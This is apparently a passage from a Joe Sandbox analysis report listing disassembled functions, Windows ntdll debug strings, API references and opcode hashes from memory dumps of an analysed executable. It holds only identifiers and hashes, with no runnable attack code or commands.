                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                • API String ID: 3446177414-3154609507
                                • Opcode ID: 494d0b82a1350984b0479048d04e6ada9f1e54be6d55eb8a08a435898d8ac549
                                • Instruction ID: 08806f34db0986e4ee78a70374528fc45d1adc865a153f5f3a59222611b07c4c
                                • Opcode Fuzzy Hash: 494d0b82a1350984b0479048d04e6ada9f1e54be6d55eb8a08a435898d8ac549
                                • Instruction Fuzzy Hash: F04122766097318FDB11CF68D940A1677E4EF88795F660A5AEC8AE7311DBB0EC00CB91
                                Function 32D6510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                Download Yara Rule
                                Strings
                                • Kernel-MUI-Language-Allowed, xrefs: 32D6519B
                                • Kernel-MUI-Language-Disallowed, xrefs: 32D65272
                                • Kernel-MUI-Language-SKU, xrefs: 32D6534B
                                • WindowsExcludedProcs, xrefs: 32D6514A
                                • Kernel-MUI-Number-Allowed, xrefs: 32D65167
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                • API String ID: 0-258546922
                                • Opcode ID: 1021b56dcc91ffc3a4a47d6bfa46d3955693b4ba11384b1eb3aca1197af6d6d3
                                • Instruction ID: 3fb7e20b4295900f5d51fb01b80b44a663942dad9fe36997d9ca7c4490069e19
                                • Opcode Fuzzy Hash: 1021b56dcc91ffc3a4a47d6bfa46d3955693b4ba11384b1eb3aca1197af6d6d3
                                • Instruction Fuzzy Hash: E6F12AB6D10219EFDB15CF98C990EAEBBB8EF08754F51406AE501B7710DBB49E41CBA0
                                Function 32E1ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: e5bbdc3c760d0e043db0f6d2a85293c383896dd73f21ccc3909016ed77e77e5f
                                • Instruction ID: 6e07927f058756638946c8df6b946f96f787cb6c2e7573a9aa0ea6fd80afe59a
                                • Opcode Fuzzy Hash: e5bbdc3c760d0e043db0f6d2a85293c383896dd73f21ccc3909016ed77e77e5f
                                • Instruction Fuzzy Hash: 96F108B7F006158BCB08CF69C99167DBBF5AF88204B5A817DD866DB380DA74F941CB50
                                Function 32D37662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                • API String ID: 0-3061284088
                                • Opcode ID: ff122fff1b28bc3b393da9e7623e8486c89efdaf9858c4f29217a8766c8e4286
                                • Instruction ID: 593ad0aa16f708d090ad086cebfa710c32384fc73a4152dd8470e70c22507c59
                                • Opcode Fuzzy Hash: ff122fff1b28bc3b393da9e7623e8486c89efdaf9858c4f29217a8766c8e4286
                                • Instruction Fuzzy Hash: C9014737006280EEF34A832DF409FC277A4DB46731F25448AF1404BF90DEA5A884D970
                                Function 32D40485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • kLsE, xrefs: 32D405FE
                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32D40586
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                • API String ID: 3446177414-2547482624
                                • Opcode ID: 59107cfec910269859bb303286f3a6fbeaa942a06346f9510480ceb7e99d9d2b
                                • Instruction ID: fd944123264df6516f028efab1720023ceafe963bcf2333c19d19ed4fea93487
                                • Opcode Fuzzy Hash: 59107cfec910269859bb303286f3a6fbeaa942a06346f9510480ceb7e99d9d2b
                                • Instruction Fuzzy Hash: 3751BAB5A00746DFE718DFA4D4407AAB7F4EF44305F00882EDA9A97340EF709545CBA1
                                Function 32D4A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                • API String ID: 0-379654539
                                • Opcode ID: 1cb030cf80cf8c16f842bd66b7bd1b0de61fdc72c9089b2a259daf0a790758e1
                                • Instruction ID: c4d8357b3baf2f64357870d1dfd25744c9305bf254809fdd18eb4577a6255dcf
                                • Opcode Fuzzy Hash: 1cb030cf80cf8c16f842bd66b7bd1b0de61fdc72c9089b2a259daf0a790758e1
                                • Instruction Fuzzy Hash: F8C19A74108382CFE715CF65C165B5AB7E4BF84748F40896AF8998B390EF74C946CB62
                                Function 004065AA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,00427648,00000000,00406657,00425A48), ref: 004065B5
                                • FindClose.KERNEL32(00000000), ref: 004065C1
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20208862651.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.20208754546.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20208936956.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209009714.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000003.00000002.20209075226.0000000000455000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_temp_executable.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: HvB
                                • API String ID: 2295610775-1619000230
                                • Opcode ID: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction ID: d1368554cb410e246732b21b307163ecdbcfd804cd616700c419d461b784c5b9
                                • Opcode Fuzzy Hash: 1a79fd4cd6ac794e938e769cbdac9cc28720eba36b1ba893e73712489ff4ef95
                                • Instruction Fuzzy Hash: 72D0123155A1206FC25057387E0C84B7A999F153717518B36B0A6F11E4C7348C6686AD
                                Function 32D78322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                Download Yara Rule
                                Strings
                                • LdrpInitializeProcess, xrefs: 32D78342
                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 32D7847E
                                • @, xrefs: 32D784B1
                                • minkernel\ntdll\ldrinit.c, xrefs: 32D78341
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                • API String ID: 0-1918872054
                                • Opcode ID: 26260a53b4871c131f08a9d089b4041dbb8ce6cde1f2f112ed719807be2031f2
                                • Instruction ID: 88d9cf8523a0fb658b7054aab21dfd9b3fed2f129bb2cbe523a2c1e51cb4a2ec
                                • Opcode Fuzzy Hash: 26260a53b4871c131f08a9d089b4041dbb8ce6cde1f2f112ed719807be2031f2
                                • Instruction Fuzzy Hash: A2918271508385AFE721CF24D854FABB7EDAF84788F40092EFA85D2250D778D944DB62
                                Function 32D7265C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 32DB20C0
                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32DB1FE3, 32DB20BB
                                • SXS: %s() passed the empty activation context, xrefs: 32DB1FE8
                                • .Local, xrefs: 32D727F8
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                • API String ID: 0-1239276146
                                • Opcode ID: fd0d155684ae9a82f3fb6b2263a5d8b95f8e5890c47398ab385c8946a0584c0b
                                • Instruction ID: 9d3cd095d6571c6d9a44d9ea957fc7b9ecb8d381dec5f7d39a06550b1a1e1a37
                                • Opcode Fuzzy Hash: fd0d155684ae9a82f3fb6b2263a5d8b95f8e5890c47398ab385c8946a0584c0b
                                • Instruction Fuzzy Hash: D1A1C07590036ADBDB24CF58DC88B99B3B0BF58318F2401EAD848A7355DB759E85CF90
                                Function 32D463CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                Download Yara Rule
                                Strings
                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32DA0E2F
                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32DA0E72
                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32DA0DEC
                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32DA0EB5
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                • API String ID: 0-1468400865
                                • Opcode ID: 4178e4a97b298ff8910b5dae178ca6877b798fc501b9a8d151ad9a667daa9498
                                • Instruction ID: 72861767d5d900e5afd56c13b6515af26535290f0076bc9b26c35e24fffcc34f
                                • Opcode Fuzzy Hash: 4178e4a97b298ff8910b5dae178ca6877b798fc501b9a8d151ad9a667daa9498
                                • Instruction Fuzzy Hash: BE71B1B59083449FDB51CF14D884F8B7BA8AF84794F800469FD498B38ADB74D588CBE2
                                Function 32D3F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                • API String ID: 0-2586055223
                                • Opcode ID: a43e68f4b7dc03ea423913a5bf3d29320a06df83b8b8cf1da73ac2856718539d
                                • Instruction ID: d317ab3438dacabaca804076285bc2c98d26c413208bc2c54c66deebae9b79a7
                                • Opcode Fuzzy Hash: a43e68f4b7dc03ea423913a5bf3d29320a06df83b8b8cf1da73ac2856718539d
                                • Instruction Fuzzy Hash: 95612575205384AFE316CB64DC44FA7B7E8EF84754F04485AFA949B391CB74E840CBA2
                                Function 32D390F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                • API String ID: 2994545307-1391187441
                                • Opcode ID: ce90d99538899fe07cd8c6f74a8d4c2b4df0176b08a3848e0c2dd5f0c27e3e95
                                • Instruction ID: a9fba41a293a306b5d5df71c26f00817f587722ab67d70c76a278f6530e6bc99
                                • Opcode Fuzzy Hash: ce90d99538899fe07cd8c6f74a8d4c2b4df0176b08a3848e0c2dd5f0c27e3e95
                                • Instruction Fuzzy Hash: D631C436901204EFEB02CB95DC88FDAB7B8EF49764F1140A1F915AB391DB71E944CA70
                                Function 32D47072 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 99d862a61134af8ac372e5e939ad98e4ffb414cfe310737f6b10ba41b6bd0fd5
                                • Instruction ID: 7ba46b736400deb1bff1a6f87eb8aeb166fdd8c2c524d46de6643b7653289672
                                • Opcode Fuzzy Hash: 99d862a61134af8ac372e5e939ad98e4ffb414cfe310737f6b10ba41b6bd0fd5
                                • Instruction Fuzzy Hash: C351EC75A01605EFFB09CF68C894BADB7B5BF44755F20816AE902A7390DFB4E901CB90
                                Function 32DD3608 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                • API String ID: 0-1168191160
                                • Opcode ID: 60e1845495c00d62cebf20ebf87b01d7a34589d5b190c31652d4371781ba95d8
                                • Instruction ID: 653935d459208341b2bcb9b902f5be8d858571f157a673802d1603b27bb952c5
                                • Opcode Fuzzy Hash: 60e1845495c00d62cebf20ebf87b01d7a34589d5b190c31652d4371781ba95d8
                                • Instruction Fuzzy Hash: 25F192B5A00A288BDBA4CF14CC80BD9B3B5EF44744F5440E9DA49A7740EB719EC5CF64
                                Function 32D41380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: , xrefs: 32D414B6
                                • HEAP[%wZ]: , xrefs: 32D41632
                                • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 32D41648
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                • API String ID: 0-3178619729
                                • Opcode ID: fa6bd37be20a68891aa9df14647d41a9a1f27cc5272cf01ad2004569020d1b5c
                                • Instruction ID: 570052702507e4fc5a81c77c4701035fd5ca6a94f0a44cc39217bc84ab3321bd
                                • Opcode Fuzzy Hash: fa6bd37be20a68891aa9df14647d41a9a1f27cc5272cf01ad2004569020d1b5c
                                • Instruction Fuzzy Hash: 83E1CE74A043459FEB19CF6AC4507BABBF1AF48704F548859E9DA8B385EF34E940CB50
                                Function 32D6F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                Download Yara Rule
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 32DB00F1
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 32DB00C7
                                • RTL: Re-Waiting, xrefs: 32DB0128
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                • Opcode ID: af1f501f2db4ff1fa13119901a45ffd512ea5a2e2def0f148ff090b098001d2c
                                • Instruction ID: 8ecb08d19c68f9cac395ec5882b1275934e4fc3d801a510c69391ec10c86a7cc
                                • Opcode Fuzzy Hash: af1f501f2db4ff1fa13119901a45ffd512ea5a2e2def0f148ff090b098001d2c
                                • Instruction Fuzzy Hash: 4CE1CE75608B419FE725CF28C890B2AB7E0BF84358F604A59F5A68B3E0DB74D944CB52
                                Function 32DC330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                • API String ID: 0-2391371766
                                • Opcode ID: 35a0fb8a8f5626847b13b87655b1eea01e409744d4040ac9b6de85dd07e31aaf
                                • Instruction ID: 016b011edb05254b5e853330388af53846db131a002220c2b3c056dac315a525
                                • Opcode Fuzzy Hash: 35a0fb8a8f5626847b13b87655b1eea01e409744d4040ac9b6de85dd07e31aaf
                                • Instruction Fuzzy Hash: C5B1E0B1644395AFE351DF54C8C1B5BB7E8FB48754F400929FA409B790DBB0E848CBA2
                                Function 32D3A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: FilterFullPath$UseFilter$\??\
                                • API String ID: 0-2779062949
                                • Opcode ID: 2817c9329ac8aa565a6ef4e514bf2ca16a5890886bb138a579f8ba1d4825c28e
                                • Instruction ID: 5362a850b8fea65354ed2b6ed562838101aac38fbd0c72f2868c98d50f9875cb
                                • Opcode Fuzzy Hash: 2817c9329ac8aa565a6ef4e514bf2ca16a5890886bb138a579f8ba1d4825c28e
                                • Instruction Fuzzy Hash: CDA17D759016699BEB21DF24CC88BEAB7B8EF09704F1005EAE908A7350DB759EC4CF50
                                Function 32DD327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                • API String ID: 0-318774311
                                • Opcode ID: 8d7050875afe3818e492717845c2085b210d0d995fdbad191b76f93dde9e0eb0
                                • Instruction ID: 93485a57df74e687576d7115abf1885d2e0339902b3df7f4a9011512827e5ade
                                • Opcode Fuzzy Hash: 8d7050875afe3818e492717845c2085b210d0d995fdbad191b76f93dde9e0eb0
                                • Instruction Fuzzy Hash: 96819CB1608B40AFE755CF24C984B6AB7E8EF84754F44096DF9809B790DBB4D900CFA2
                                Function 32D4B360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                • API String ID: 0-373624363
                                • Opcode ID: 1124a4dcee043c5064845e31d8cfc05532ac95bd1362cfadf0c64418fc68ee92
                                • Instruction ID: 61e0f1c239f437e04bb42bbb087b634d6dca75abe25170d48822c415fde33e4a
                                • Opcode Fuzzy Hash: 1124a4dcee043c5064845e31d8cfc05532ac95bd1362cfadf0c64418fc68ee92
                                • Instruction Fuzzy Hash: C391CC75E04359CBEB15CF58D450BAEB7B1EF14368F548199EC84AB390DF789A80CB90
                                Function 32E1B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                Download Yara Rule
                                Strings
                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 32E1B3AA
                                • GlobalizationUserSettings, xrefs: 32E1B3B4
                                • TargetNtPath, xrefs: 32E1B3AF
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                • API String ID: 0-505981995
                                • Opcode ID: 25d39f381e56fd76dd39febc0b7a3cb470244449ceecae0589ac8b79f843c0f4
                                • Instruction ID: a44dc8cc500305fdeb9a0d00271e0bb903d56b96512591a53d5a462cfef88158
                                • Opcode Fuzzy Hash: 25d39f381e56fd76dd39febc0b7a3cb470244449ceecae0589ac8b79f843c0f4
                                • Instruction Fuzzy Hash: FF61C372D41228ABDB21DF54DC89BDAB7B9EB04714F4141E9E908AB350DB74EE84CF90
                                Function 32D3F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: , xrefs: 32D9E442
                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 32D9E455
                                • HEAP[%wZ]: , xrefs: 32D9E435
                                Memory Dump Source
                                • Source File: 00000003.00000002.20223319876.0000000032D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D10000, based on PE: true
                                • Associated: 00000003.00000002.20223319876.0000000032E39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.20223319876.0000000032E3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_32d10000_temp_executable.jbxd
                                Similarity
                                • API ID:
                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                • API String ID: 0-1340214556
                                • Opcode ID: f556f9abdadce728d33885d379d8b83e65071334db28a17ee11bf9c91e7fcdd7
                                • Instruction ID: b81b6b68f743b98903806af0e235bcaf2ddfba6e30ddc25c36672eb6497903f9
                                • Opcode Fuzzy Hash: f556f9abdadce728d33885d379d8b83e65071334db28a17ee11bf9c91e7fcdd7
                                • Instruction Fuzzy Hash: 96513775601788EFE706CBA4C884F9ABBF8FF05344F1440A5E6808B792D7B4E940CB60
                                Function 32DED62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                Download Yara Rule
                                Strings
                                • HEAP: , xrefs: 32DED79F
                                • HEAP[%wZ]: , xrefs: 32DED792
                                • Heap block at %p modified at %p past requested size of %Ix, xrefs: 32DED7B2
                                Memory Dump Source
